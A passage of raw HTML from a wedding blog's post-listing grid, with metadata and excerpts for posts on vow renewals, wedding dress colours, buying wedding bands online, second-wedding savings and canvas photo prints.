icon-entypo-comment"></i> 0 </a> <meta itemprop="interactionCount" content="UserComments:0"/> <span class="vw-post-views"><i class="vw-icon icon-entypo-eye"></i> 3.5k</span> </div> </div> </div> </div> <meta itemprop="datePublished" content="2019-01-10T14:17:33-04:00"/><meta itemprop="dateModified" content="2019-01-11T12:37:26-04:00"/><meta itemprop="author" content="I Do Take Two"/><meta itemprop="interactionCount" content="UserComments:0"/> <div itemprop="publisher" itemscope itemtype="https://schema.org/Organization"> <div itemprop="logo" itemscope itemtype="https://schema.org/ImageObject"> <meta itemprop="url" content="https://www.idotaketwo.com/blog/wp-content/uploads/2019/04/IdoTakeTwo_Logo_275.png"> <meta itemprop="width" content="275"> <meta itemprop="height" content="53"> </div> <meta itemprop="name" content="I Do Take Two"> </div> <div itemprop='image' itemscope='itemscope' itemtype='https://schema.org/ImageObject'> <meta itemprop='url' content='https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2019/01/man-made-diamond.jpg?fit=1500%2C1000&#038;ssl=1'/> <meta itemprop='width' content='1500'/> <meta itemprop='height' content='1000'/> </div> </div> </div> <div class="vw-flex-grid__item" data-slugs="inspiration wedding-advice wedding-planning-2"> <div class="vw-post-box vw-post-box--block-a vw-inview post-9869 post type-post status-publish format-standard has-post-thumbnail hentry category-inspiration category-wedding-advice category-wedding-planning-2" itemscope itemtype="https://schema.org/Article" > <div class="vw-post-box__inner"> <div class="vw-post-box__thumbnail-wrapper"> <div class="vw-post-box__thumbnail" > <img width="335" height="186" src="https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2019/01/how-to-have-a-standout-wedding.jpg?resize=335%2C186&amp;ssl=1" class="attachment-presso_thumbnail_medium size-presso_thumbnail_medium wp-post-image" alt="standout wedding day ideas" srcset="https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2019/01/how-to-have-a-standout-wedding.jpg?resize=150%2C83&amp;ssl=1 150w, https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2019/01/how-to-have-a-standout-wedding.jpg?resize=335%2C186&amp;ssl=1 335w, https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2019/01/how-to-have-a-standout-wedding.jpg?resize=225%2C125&amp;ssl=1 225w" sizes="(max-width: 335px) 100vw, 335px" itemprop="image" /> </div> <a href="https://www.idotaketwo.com/blog/21-ways-you-can-make-your-wedding-a-stand-out-affair/" class="vw-post-box__overlay vw-post-box__overlay--link"> </a> </div> <div class="vw-post-box__content"> <div class="vw-categories"><a class=" vw-cat-id-95" href="https://www.idotaketwo.com/blog/category/inspiration/" title="View all posts in Inspiration" rel="category">Inspiration</a><a class=" vw-cat-id-95 vw-cat-id-1310" href="https://www.idotaketwo.com/blog/category/wedding-advice/" title="View all posts in Wedding Advice" rel="category">Wedding Advice</a><a class=" vw-cat-id-95 vw-cat-id-1310 vw-cat-id-163" href="https://www.idotaketwo.com/blog/category/wedding-planning-2/" title="View all posts in Wedding Planning" rel="category">Wedding Planning</a></div> <h3 class="vw-post-box__title" itemprop="headline" > <a class="vw-post-box__link" href="https://www.idotaketwo.com/blog/21-ways-you-can-make-your-wedding-a-stand-out-affair/" itemprop="url" rel="bookmark"> 21 Ways You Can Make Your Wedding a Stand-Out Affair </a> </h3> <div class="vw-post-box__meta"> <span class="vw-post-author" itemprop="author" > <a class="vw-avatar" href="https://www.idotaketwo.com/blog/author/gracelynne/" title="Posts by Grace Lynne Fleming"><img itemprop="image" src="http://1.gravatar.com/avatar/ddeb668258f69fdbc014b0179f99c1f0?s=16&#038;d=mm&#038;r=g" width="16" height="16" alt="Grace Lynne Fleming" class="avatar avatar-16 wp-user-avatar wp-user-avatar-16 photo avatar-default" /></a> <a class="vw-post-author__name" href="https://www.idotaketwo.com/blog/author/gracelynne/" title="Posts by %s Grace Lynne Fleming" rel="author" itemprop="name" >Grace Lynne Fleming</a> </span> <a href="https://www.idotaketwo.com/blog/21-ways-you-can-make-your-wedding-a-stand-out-affair/" class="vw-post-date updated" title="Permalink to 21 Ways You Can Make Your Wedding a Stand-Out Affair" rel="bookmark"><time itemprop="datePublished" datetime="2019-01-08T12:32:51-04:00">January 8, 2019</time></a> </div> <div class="vw-post-box__excerpt"><p>Within the world of weddings, tradition has taken a backseat to originality. So long are the days of an expected timeline of events. Instead, we’re seeing Pinterest-worthy photo-ops and personalized parts to the party at every turn. But in the midst of all those unique additions how can one be sure to create a wedding &#8230;</p> </div> <div class="vw-post-box__footer vw-fixed-bar"> <div class="vw-bar__placeholder vw-bar__placeholder--left"> <a class="vw-post-box__read-more" href="https://www.idotaketwo.com/blog/21-ways-you-can-make-your-wedding-a-stand-out-affair/"> Read More <i class="vw-icon icon-entypo-right-open"></i> </a> </div> <div class="vw-bar__placeholder vw-bar__placeholder--right"> <a class="vw-post-comment-count" href="https://www.idotaketwo.com/blog/21-ways-you-can-make-your-wedding-a-stand-out-affair/#respond" title="Comments"> <i class="vw-icon icon-entypo-comment"></i> 0 </a> <meta itemprop="interactionCount" content="UserComments:0"/> <span class="vw-post-views"><i class="vw-icon icon-entypo-eye"></i> 3.5k</span> </div> </div> </div> </div> <meta itemprop="datePublished" content="2019-01-08T12:32:51-04:00"/><meta itemprop="dateModified" content="2019-05-07T18:36:25-04:00"/><meta itemprop="author" content="Grace Lynne Fleming"/><meta itemprop="interactionCount" content="UserComments:0"/> <div itemprop="publisher" itemscope itemtype="https://schema.org/Organization"> <div itemprop="logo" itemscope itemtype="https://schema.org/ImageObject"> <meta itemprop="url" content="https://www.idotaketwo.com/blog/wp-content/uploads/2019/04/IdoTakeTwo_Logo_275.png"> <meta itemprop="width" content="275"> <meta itemprop="height" content="53"> </div> <meta itemprop="name" content="I Do Take Two"> </div> <div itemprop='image' itemscope='itemscope' itemtype='https://schema.org/ImageObject'> <meta itemprop='url' content='https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2019/01/how-to-have-a-standout-wedding.jpg?fit=600%2C399&#038;ssl=1'/> <meta itemprop='width' content='600'/> <meta itemprop='height' content='399'/> </div> </div> </div> <div class="vw-flex-grid__item" data-slugs="wedding-dress"> <div class="vw-post-box vw-post-box--block-a vw-inview post-9853 post type-post status-publish format-standard has-post-thumbnail hentry category-wedding-dress" itemscope itemtype="https://schema.org/Article" > <div class="vw-post-box__inner"> <div class="vw-post-box__thumbnail-wrapper"> <div class="vw-post-box__thumbnail" > <img width="335" height="186" src="https://i1.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2018/12/colorful-wedding-gowns.jpg?resize=335%2C186&amp;ssl=1" class="attachment-presso_thumbnail_medium size-presso_thumbnail_medium wp-post-image" alt="blush wedding gown" srcset="https://i1.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2018/12/colorful-wedding-gowns.jpg?resize=150%2C83&amp;ssl=1 150w, https://i1.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2018/12/colorful-wedding-gowns.jpg?resize=335%2C186&amp;ssl=1 335w, https://i1.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2018/12/colorful-wedding-gowns.jpg?resize=225%2C125&amp;ssl=1 225w, https://i1.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2018/12/colorful-wedding-gowns.jpg?zoom=2&amp;resize=335%2C186&amp;ssl=1 670w" sizes="(max-width: 335px) 100vw, 335px" itemprop="image" /> </div> <a href="https://www.idotaketwo.com/blog/what-the-color-of-your-wedding-dress-says-about-you/" class="vw-post-box__overlay vw-post-box__overlay--link"> </a> </div> <div class="vw-post-box__content"> <div class="vw-categories"><a class=" vw-cat-id-1281" href="https://www.idotaketwo.com/blog/category/wedding-dress/" title="View all posts in Wedding Dress" rel="category">Wedding Dress</a></div> <h3 class="vw-post-box__title" itemprop="headline" > <a class="vw-post-box__link" href="https://www.idotaketwo.com/blog/what-the-color-of-your-wedding-dress-says-about-you/" itemprop="url" rel="bookmark"> What the Color of Your Wedding Dress Says About You </a> </h3> <div class="vw-post-box__meta"> <span class="vw-post-author" itemprop="author" > <a class="vw-avatar" href="https://www.idotaketwo.com/blog/author/gracelynne/" title="Posts by Grace Lynne Fleming"><img itemprop="image" src="http://1.gravatar.com/avatar/ddeb668258f69fdbc014b0179f99c1f0?s=16&#038;d=mm&#038;r=g" width="16" height="16" alt="Grace Lynne Fleming" class="avatar avatar-16 wp-user-avatar wp-user-avatar-16 photo avatar-default" /></a> <a class="vw-post-author__name" href="https://www.idotaketwo.com/blog/author/gracelynne/" title="Posts by %s Grace Lynne Fleming" rel="author" itemprop="name" >Grace Lynne Fleming</a> </span> <a href="https://www.idotaketwo.com/blog/what-the-color-of-your-wedding-dress-says-about-you/" class="vw-post-date updated" title="Permalink to What the Color of Your Wedding Dress Says About You" rel="bookmark"><time itemprop="datePublished" datetime="2018-12-22T11:26:48-04:00">December 22, 2018</time></a> </div> <div class="vw-post-box__excerpt"><p>We know that certain colors tend to create different meanings, and that’s no exception in the world of wedding gowns. Red evokes a sense of passion and pink exudes youthful femininity. When you’re trying to create a sense of warmth and welcomed appeal in your home, you may go the traditional route by dipping your &#8230;</p> </div> <div class="vw-post-box__footer vw-fixed-bar"> <div class="vw-bar__placeholder vw-bar__placeholder--left"> <a class="vw-post-box__read-more" href="https://www.idotaketwo.com/blog/what-the-color-of-your-wedding-dress-says-about-you/"> Read More <i class="vw-icon icon-entypo-right-open"></i> </a> </div> <div class="vw-bar__placeholder vw-bar__placeholder--right"> <a class="vw-post-comment-count" href="https://www.idotaketwo.com/blog/what-the-color-of-your-wedding-dress-says-about-you/#respond" title="Comments"> <i class="vw-icon icon-entypo-comment"></i> 0 </a> <meta itemprop="interactionCount" content="UserComments:0"/> <span class="vw-post-views"><i class="vw-icon icon-entypo-eye"></i> 3.5k</span> </div> </div> </div> </div> <meta itemprop="datePublished" content="2018-12-22T11:26:48-04:00"/><meta itemprop="dateModified" content="2018-12-22T11:26:48-04:00"/><meta itemprop="author" content="Grace Lynne Fleming"/><meta itemprop="interactionCount" content="UserComments:0"/> <div itemprop="publisher" itemscope itemtype="https://schema.org/Organization"> <div itemprop="logo" itemscope itemtype="https://schema.org/ImageObject"> <meta itemprop="url" content="https://www.idotaketwo.com/blog/wp-content/uploads/2019/04/IdoTakeTwo_Logo_275.png"> <meta itemprop="width" content="275"> <meta itemprop="height" content="53"> </div> <meta itemprop="name" content="I Do Take Two"> </div> <div itemprop='image' itemscope='itemscope' itemtype='https://schema.org/ImageObject'> <meta itemprop='url' content='https://i1.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2018/12/colorful-wedding-gowns.jpg?fit=792%2C792&#038;ssl=1'/> <meta itemprop='width' content='792'/> <meta itemprop='height' content='792'/> </div> </div> </div> <div class="vw-flex-grid__item" data-slugs="second-wedding-2"> <div class="vw-post-box vw-post-box--block-a vw-inview post-9849 post type-post status-publish format-standard has-post-thumbnail hentry category-second-wedding-2 tag-renewal" itemscope itemtype="https://schema.org/Article" > <div class="vw-post-box__inner"> <div class="vw-post-box__thumbnail-wrapper"> <div class="vw-post-box__thumbnail" > <img width="335" height="186" src="https://i0.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2018/12/wedding-renewl.jpeg?resize=335%2C186&amp;ssl=1" class="attachment-presso_thumbnail_medium size-presso_thumbnail_medium wp-post-image" alt="" srcset="https://i0.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2018/12/wedding-renewl.jpeg?resize=150%2C83&amp;ssl=1 150w, https://i0.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2018/12/wedding-renewl.jpeg?resize=335%2C186&amp;ssl=1 335w, https://i0.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2018/12/wedding-renewl.jpeg?resize=225%2C125&amp;ssl=1 225w, https://i0.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2018/12/wedding-renewl.jpeg?zoom=2&amp;resize=335%2C186&amp;ssl=1 670w, https://i0.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2018/12/wedding-renewl.jpeg?zoom=3&amp;resize=335%2C186&amp;ssl=1 1005w" sizes="(max-width: 335px) 100vw, 335px" itemprop="image" /> </div> <a href="https://www.idotaketwo.com/blog/how-to-make-your-vow-renewal-extra-special/" class="vw-post-box__overlay vw-post-box__overlay--link"> </a> </div> <div class="vw-post-box__content"> <div class="vw-categories"><a class=" vw-cat-id-138" href="https://www.idotaketwo.com/blog/category/second-wedding-2/" title="View all posts in Second Wedding" rel="category">Second Wedding</a></div> <h3 class="vw-post-box__title" itemprop="headline" > <a class="vw-post-box__link" href="https://www.idotaketwo.com/blog/how-to-make-your-vow-renewal-extra-special/" itemprop="url" rel="bookmark"> How to Make Your Vow Renewal Extra Special </a> </h3> <div class="vw-post-box__meta"> <span class="vw-post-author" itemprop="author" > <a class="vw-avatar" href="https://www.idotaketwo.com/blog/author/erinr/" title="Posts by I Do Take Two"><img itemprop="image" src="https://i0.wp.com/www.idotaketwo.com/blog/wp-content/uploads/1496165362_female1.png?fit=16%2C16&amp;ssl=1" width="16" height="16" alt="I Do Take Two" class="avatar avatar-16 wp-user-avatar wp-user-avatar-16 alignnone photo" /></a> <a class="vw-post-author__name" href="https://www.idotaketwo.com/blog/author/erinr/" title="Posts by %s I Do Take Two" rel="author" itemprop="name" >I Do Take Two</a> </span> <a href="https://www.idotaketwo.com/blog/how-to-make-your-vow-renewal-extra-special/" class="vw-post-date updated" title="Permalink to How to Make Your Vow Renewal Extra Special" rel="bookmark"><time itemprop="datePublished" datetime="2018-12-17T14:29:43-04:00">December 17, 2018</time></a> </div> <div class="vw-post-box__excerpt"><p>For many, getting married to the person you love is one of the greatest experiences. A wedding allows you to pledge your commitment to one another while expressing your love in front of friends and family. Once the wedding is over, though, this does not mean you cannot celebrate your love again. While there are &#8230;</p> </div> <div class="vw-post-box__footer vw-fixed-bar"> <div class="vw-bar__placeholder vw-bar__placeholder--left"> <a class="vw-post-box__read-more" href="https://www.idotaketwo.com/blog/how-to-make-your-vow-renewal-extra-special/"> Read More <i class="vw-icon icon-entypo-right-open"></i> </a> </div> <div class="vw-bar__placeholder vw-bar__placeholder--right"> <a class="vw-post-comment-count" href="https://www.idotaketwo.com/blog/how-to-make-your-vow-renewal-extra-special/#respond" title="Comments"> <i class="vw-icon icon-entypo-comment"></i> 0 </a> <meta itemprop="interactionCount" content="UserComments:0"/> <span class="vw-post-views"><i class="vw-icon icon-entypo-eye"></i> 3.6k</span> </div> </div> </div> </div> <meta itemprop="datePublished" content="2018-12-17T14:29:43-04:00"/><meta itemprop="dateModified" content="2018-12-17T14:29:43-04:00"/><meta itemprop="author" content="I Do Take Two"/><meta itemprop="interactionCount" content="UserComments:0"/> <div itemprop="publisher" itemscope itemtype="https://schema.org/Organization"> <div itemprop="logo" itemscope itemtype="https://schema.org/ImageObject"> <meta itemprop="url" content="https://www.idotaketwo.com/blog/wp-content/uploads/2019/04/IdoTakeTwo_Logo_275.png"> <meta itemprop="width" content="275"> <meta itemprop="height" content="53"> </div> <meta itemprop="name" content="I Do Take Two"> </div> <div itemprop='image' itemscope='itemscope' itemtype='https://schema.org/ImageObject'> <meta itemprop='url' content='https://i0.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2018/12/wedding-renewl.jpeg?fit=1280%2C895&#038;ssl=1'/> <meta itemprop='width' content='1280'/> <meta itemprop='height' content='895'/> </div> </div> </div> <div class="vw-flex-grid__item" data-slugs="questions-answered"> <div class="vw-post-box vw-post-box--block-a vw-inview post-9845 post type-post status-publish format-standard has-post-thumbnail hentry category-questions-answered" itemscope itemtype="https://schema.org/Article" > <div class="vw-post-box__inner"> <div class="vw-post-box__thumbnail-wrapper"> <div class="vw-post-box__thumbnail" > <img width="335" height="186" src="https://i1.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2018/12/buying-wedding-bands-online.jpg?resize=335%2C186&amp;ssl=1" class="attachment-presso_thumbnail_medium size-presso_thumbnail_medium wp-post-image" alt="stacks of wedding bands" srcset="https://i1.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2018/12/buying-wedding-bands-online.jpg?resize=150%2C83&amp;ssl=1 150w, https://i1.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2018/12/buying-wedding-bands-online.jpg?resize=335%2C186&amp;ssl=1 335w, https://i1.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2018/12/buying-wedding-bands-online.jpg?resize=225%2C125&amp;ssl=1 225w" sizes="(max-width: 335px) 100vw, 335px" itemprop="image" /> </div> <a href="https://www.idotaketwo.com/blog/qa-should-you-worry-about-buying-your-wedding-band-online/" class="vw-post-box__overlay vw-post-box__overlay--link"> </a> </div> <div class="vw-post-box__content"> <div class="vw-categories"><a class=" vw-cat-id-210" href="https://www.idotaketwo.com/blog/category/questions-answered/" title="View all posts in Questions Answered" rel="category">Questions Answered</a></div> <h3 class="vw-post-box__title" itemprop="headline" > <a class="vw-post-box__link" href="https://www.idotaketwo.com/blog/qa-should-you-worry-about-buying-your-wedding-band-online/" itemprop="url" rel="bookmark"> [Q&#038;A] Should You Worry About Buying Your Wedding Band Online? </a> </h3> <div class="vw-post-box__meta"> <span class="vw-post-author" itemprop="author" > <a class="vw-avatar" href="https://www.idotaketwo.com/blog/author/gracelynne/" title="Posts by Grace Lynne Fleming"><img itemprop="image" src="http://1.gravatar.com/avatar/ddeb668258f69fdbc014b0179f99c1f0?s=16&#038;d=mm&#038;r=g" width="16" height="16" alt="Grace Lynne Fleming" class="avatar avatar-16 wp-user-avatar wp-user-avatar-16 photo avatar-default" /></a> <a class="vw-post-author__name" href="https://www.idotaketwo.com/blog/author/gracelynne/" title="Posts by %s Grace Lynne Fleming" rel="author" itemprop="name" >Grace Lynne Fleming</a> </span> <a href="https://www.idotaketwo.com/blog/qa-should-you-worry-about-buying-your-wedding-band-online/" class="vw-post-date updated" title="Permalink to [Q&#038;A] Should You Worry About Buying Your Wedding Band Online?" rel="bookmark"><time itemprop="datePublished" datetime="2018-12-07T12:13:05-04:00">December 7, 2018</time></a> </div> <div class="vw-post-box__excerpt"><p>As long as you do a bit of research beforehand, buying wedding bands online is an okay way to go &#8211; and you can do so without worry and with the added opportunity of finding something a bit more personalized and unique. Furthermore, there’s even the possible benefit of saving money on the bottom line &#8230;</p> </div> <div class="vw-post-box__footer vw-fixed-bar"> <div class="vw-bar__placeholder vw-bar__placeholder--left"> <a class="vw-post-box__read-more" href="https://www.idotaketwo.com/blog/qa-should-you-worry-about-buying-your-wedding-band-online/"> Read More <i class="vw-icon icon-entypo-right-open"></i> </a> </div> <div class="vw-bar__placeholder vw-bar__placeholder--right"> <a class="vw-post-comment-count" href="https://www.idotaketwo.com/blog/qa-should-you-worry-about-buying-your-wedding-band-online/#respond" title="Comments"> <i class="vw-icon icon-entypo-comment"></i> 0 </a> <meta itemprop="interactionCount" content="UserComments:0"/> <span class="vw-post-views"><i class="vw-icon icon-entypo-eye"></i> 3.5k</span> </div> </div> </div> </div> <meta itemprop="datePublished" content="2018-12-07T12:13:05-04:00"/><meta itemprop="dateModified" content="2019-03-08T02:52:49-04:00"/><meta itemprop="author" content="Grace Lynne Fleming"/><meta itemprop="interactionCount" content="UserComments:0"/> <div itemprop="publisher" itemscope itemtype="https://schema.org/Organization"> <div itemprop="logo" itemscope itemtype="https://schema.org/ImageObject"> <meta itemprop="url" content="https://www.idotaketwo.com/blog/wp-content/uploads/2019/04/IdoTakeTwo_Logo_275.png"> <meta itemprop="width" content="275"> <meta itemprop="height" content="53"> </div> <meta itemprop="name" content="I Do Take Two"> </div> <div itemprop='image' itemscope='itemscope' itemtype='https://schema.org/ImageObject'> <meta itemprop='url' content='https://i1.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2018/12/buying-wedding-bands-online.jpg?fit=340%2C450&#038;ssl=1'/> <meta itemprop='width' content='340'/> <meta itemprop='height' content='450'/> </div> </div> </div> <div class="vw-flex-grid__item" data-slugs="etiquette-planning inspiration second-wedding-2 wedding-advice wedding-planning-2"> <div class="vw-post-box vw-post-box--block-a vw-inview post-9841 post type-post status-publish format-standard has-post-thumbnail hentry category-etiquette-planning category-inspiration category-second-wedding-2 category-wedding-advice category-wedding-planning-2" itemscope itemtype="https://schema.org/Article" > <div class="vw-post-box__inner"> <div class="vw-post-box__thumbnail-wrapper"> <div class="vw-post-box__thumbnail" > <img width="335" height="186" src="https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2018/11/second-wedding-saving-money.jpg?resize=335%2C186&amp;ssl=1" class="attachment-presso_thumbnail_medium size-presso_thumbnail_medium wp-post-image" alt="how to save money on a second wedding" srcset="https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2018/11/second-wedding-saving-money.jpg?resize=150%2C83&amp;ssl=1 150w, https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2018/11/second-wedding-saving-money.jpg?resize=335%2C186&amp;ssl=1 335w, https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2018/11/second-wedding-saving-money.jpg?resize=225%2C125&amp;ssl=1 225w, https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2018/11/second-wedding-saving-money.jpg?zoom=2&amp;resize=335%2C186&amp;ssl=1 670w" sizes="(max-width: 335px) 100vw, 335px" itemprop="image" /> </div> <a href="https://www.idotaketwo.com/blog/save-money-on-your-second-wedding-10-great-ideas/" class="vw-post-box__overlay vw-post-box__overlay--link"> </a> </div> <div class="vw-post-box__content"> <div class="vw-categories"><a class=" vw-cat-id-5" href="https://www.idotaketwo.com/blog/category/etiquette-planning/" title="View all posts in Etiquette &amp; Planning" rel="category">Etiquette &amp; Planning</a><a class=" vw-cat-id-5 vw-cat-id-95" href="https://www.idotaketwo.com/blog/category/inspiration/" title="View all posts in Inspiration" rel="category">Inspiration</a><a class=" vw-cat-id-5 vw-cat-id-95 vw-cat-id-138" href="https://www.idotaketwo.com/blog/category/second-wedding-2/" title="View all posts in Second Wedding" rel="category">Second Wedding</a><a class=" vw-cat-id-5 vw-cat-id-95 vw-cat-id-138 vw-cat-id-1310" href="https://www.idotaketwo.com/blog/category/wedding-advice/" title="View all posts in Wedding Advice" rel="category">Wedding Advice</a><a class=" vw-cat-id-5 vw-cat-id-95 vw-cat-id-138 vw-cat-id-1310 vw-cat-id-163" href="https://www.idotaketwo.com/blog/category/wedding-planning-2/" title="View all posts in Wedding Planning" rel="category">Wedding Planning</a></div> <h3 class="vw-post-box__title" itemprop="headline" > <a class="vw-post-box__link" href="https://www.idotaketwo.com/blog/save-money-on-your-second-wedding-10-great-ideas/" itemprop="url" rel="bookmark"> Save Money on Your Second Wedding: 10 Great Ideas </a> </h3> <div class="vw-post-box__meta"> <span class="vw-post-author" itemprop="author" > <a class="vw-avatar" href="https://www.idotaketwo.com/blog/author/gracelynne/" title="Posts by Grace Lynne Fleming"><img itemprop="image" src="http://1.gravatar.com/avatar/ddeb668258f69fdbc014b0179f99c1f0?s=16&#038;d=mm&#038;r=g" width="16" height="16" alt="Grace Lynne Fleming" class="avatar avatar-16 wp-user-avatar wp-user-avatar-16 photo avatar-default" /></a> <a class="vw-post-author__name" href="https://www.idotaketwo.com/blog/author/gracelynne/" title="Posts by %s Grace Lynne Fleming" rel="author" itemprop="name" >Grace Lynne Fleming</a> </span> <a href="https://www.idotaketwo.com/blog/save-money-on-your-second-wedding-10-great-ideas/" class="vw-post-date updated" title="Permalink to Save Money on Your Second Wedding: 10 Great Ideas" rel="bookmark"><time itemprop="datePublished" datetime="2018-11-28T11:23:54-04:00">November 28, 2018</time></a> </div> <div class="vw-post-box__excerpt"><p>Planning a second wedding doesn’t have to become synonymous with “savings depletion.” And just because you want to budget wisely doesn’t mean you can’t have a beautiful ceremony and reception to celebrate the new nuptials. Instead, you just have to be let in on some of the insider secrets. 10 Great Ideas For Saving Money &#8230;</p> </div> <div class="vw-post-box__footer vw-fixed-bar"> <div class="vw-bar__placeholder vw-bar__placeholder--left"> <a class="vw-post-box__read-more" href="https://www.idotaketwo.com/blog/save-money-on-your-second-wedding-10-great-ideas/"> Read More <i class="vw-icon icon-entypo-right-open"></i> </a> </div> <div class="vw-bar__placeholder vw-bar__placeholder--right"> <a class="vw-post-comment-count" href="https://www.idotaketwo.com/blog/save-money-on-your-second-wedding-10-great-ideas/#respond" title="Comments"> <i class="vw-icon icon-entypo-comment"></i> 0 </a> <meta itemprop="interactionCount" content="UserComments:0"/> <span class="vw-post-views"><i class="vw-icon icon-entypo-eye"></i> 3.6k</span> </div> </div> </div> </div> <meta itemprop="datePublished" content="2018-11-28T11:23:54-04:00"/><meta itemprop="dateModified" content="2019-05-07T18:28:52-04:00"/><meta itemprop="author" content="Grace Lynne Fleming"/><meta itemprop="interactionCount" content="UserComments:0"/> <div itemprop="publisher" itemscope itemtype="https://schema.org/Organization"> <div itemprop="logo" itemscope itemtype="https://schema.org/ImageObject"> <meta itemprop="url" content="https://www.idotaketwo.com/blog/wp-content/uploads/2019/04/IdoTakeTwo_Logo_275.png"> <meta itemprop="width" content="275"> <meta itemprop="height" content="53"> </div> <meta itemprop="name" content="I Do Take Two"> </div> <div itemprop='image' itemscope='itemscope' itemtype='https://schema.org/ImageObject'> <meta itemprop='url' content='https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2018/11/second-wedding-saving-money.jpg?fit=1000%2C667&#038;ssl=1'/> <meta itemprop='width' content='1000'/> <meta itemprop='height' content='667'/> </div> </div> </div> <div class="vw-flex-grid__item" data-slugs="photography"> <div class="vw-post-box vw-post-box--block-a vw-inview post-9833 post type-post status-publish format-standard has-post-thumbnail hentry category-photography" itemscope itemtype="https://schema.org/Article" > <div class="vw-post-box__inner"> <div class="vw-post-box__thumbnail-wrapper"> <div class="vw-post-box__thumbnail" > <img width="335" height="186" src="https://i1.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2018/11/wedding-photos-printed.jpg?resize=335%2C186&amp;ssl=1" class="attachment-presso_thumbnail_medium size-presso_thumbnail_medium wp-post-image" alt="wedding photo on canvas" srcset="https://i1.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2018/11/wedding-photos-printed.jpg?resize=150%2C83&amp;ssl=1 150w, https://i1.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2018/11/wedding-photos-printed.jpg?resize=335%2C186&amp;ssl=1 335w, https://i1.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2018/11/wedding-photos-printed.jpg?resize=225%2C125&amp;ssl=1 225w, https://i1.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2018/11/wedding-photos-printed.jpg?zoom=2&amp;resize=335%2C186&amp;ssl=1 670w" sizes="(max-width: 335px) 100vw, 335px" itemprop="image" /> </div> <a href="https://www.idotaketwo.com/blog/canvas-prints-where-to-get-your-wedding-photos-printed/" class="vw-post-box__overlay vw-post-box__overlay--link"> </a> </div> <div class="vw-post-box__content"> <div class="vw-categories"><a class=" vw-cat-id-1379" href="https://www.idotaketwo.com/blog/category/photography/" title="View all posts in Photography" rel="category">Photography</a></div> <h3 class="vw-post-box__title" itemprop="headline" > <a class="vw-post-box__link" href="https://www.idotaketwo.com/blog/canvas-prints-where-to-get-your-wedding-photos-printed/" itemprop="url" rel="bookmark"> Canvas Prints: Where to Get Your Wedding Photos Printed </a> </h3> <div class="vw-post-box__meta"> <span class="vw-post-author" itemprop="author" > <a class="vw-avatar" href="https://www.idotaketwo.com/blog/author/gracelynne/" title="Posts by Grace Lynne Fleming"><img itemprop="image" src="http://1.gravatar.com/avatar/ddeb668258f69fdbc014b0179f99c1f0?s=16&#038;d=mm&#038;r=g" width="16" height="16" alt="Grace Lynne Fleming" class="avatar avatar-16 wp-user-avatar wp-user-avatar-16 photo avatar-default" /></a> <a class="vw-post-author__name" href="https://www.idotaketwo.com/blog/author/gracelynne/" title="Posts by %s Grace Lynne Fleming" rel="author" itemprop="name" >Grace Lynne Fleming</a> </span> <a href="https://www.idotaketwo.com/blog/canvas-prints-where-to-get-your-wedding-photos-printed/" class="vw-post-date updated" title="Permalink to Canvas Prints: Where to Get Your Wedding Photos Printed" rel="bookmark"><time itemprop="datePublished" datetime="2018-11-21T12:28:41-04:00">November 21, 2018</time></a> </div> <div class="vw-post-box__excerpt"><p>Spending an arm and a leg on a photographer is one thing, but spending even more on having that photographer print your photos onto canvas is an entirely different debacle (and price tag). Instead of adding onto that big bill, you can get your favorite shots made into beautiful pieces of art for your home &#8230;</p> </div> <div class="vw-post-box__footer vw-fixed-bar"> <div class="vw-bar__placeholder vw-bar__placeholder--left"> <a class="vw-post-box__read-more" href="https://www.idotaketwo.com/blog/canvas-prints-where-to-get-your-wedding-photos-printed/"> Read More <i class="vw-icon icon-entypo-right-open"></i> </a> </div> <div class="vw-bar__placeholder vw-bar__placeholder--right"> <a class="vw-post-comment-count" href="https://www.idotaketwo.com/blog/canvas-prints-where-to-get-your-wedding-photos-printed/#respond" title="Comments"> <i class="vw-icon icon-entypo-comment"></i> 0 </a> <meta itemprop="interactionCount" content="UserComments:0"/> <span class="vw-post-views"><i class="vw-icon icon-entypo-eye"></i> 3.8k</span> </div> </div> </div> </div> <meta itemprop="datePublished" content="2018-11-21T12:28:41-04:00"/><meta itemprop="dateModified" content="2018-11-21T12:28:41-04:00"/><meta itemprop="author" content="Grace Lynne Fleming"/><meta itemprop="interactionCount" content="UserComments:0"/> <div itemprop="publisher" itemscope itemtype="https://schema.org/Organization"> <div itemprop="logo" itemscope itemtype="https://schema.org/ImageObject"> <meta itemprop="url" content="https://www.idotaketwo.com/blog/wp-content/uploads/2019/04/IdoTakeTwo_Logo_275.png"> <meta itemprop="width" content="275"> <meta itemprop="height" content="53"> </div> <meta itemprop="name" content="I Do Take Two"> </div> <div itemprop='image' itemscope='itemscope' itemtype='https://schema.org/ImageObject'> <meta itemprop='url' 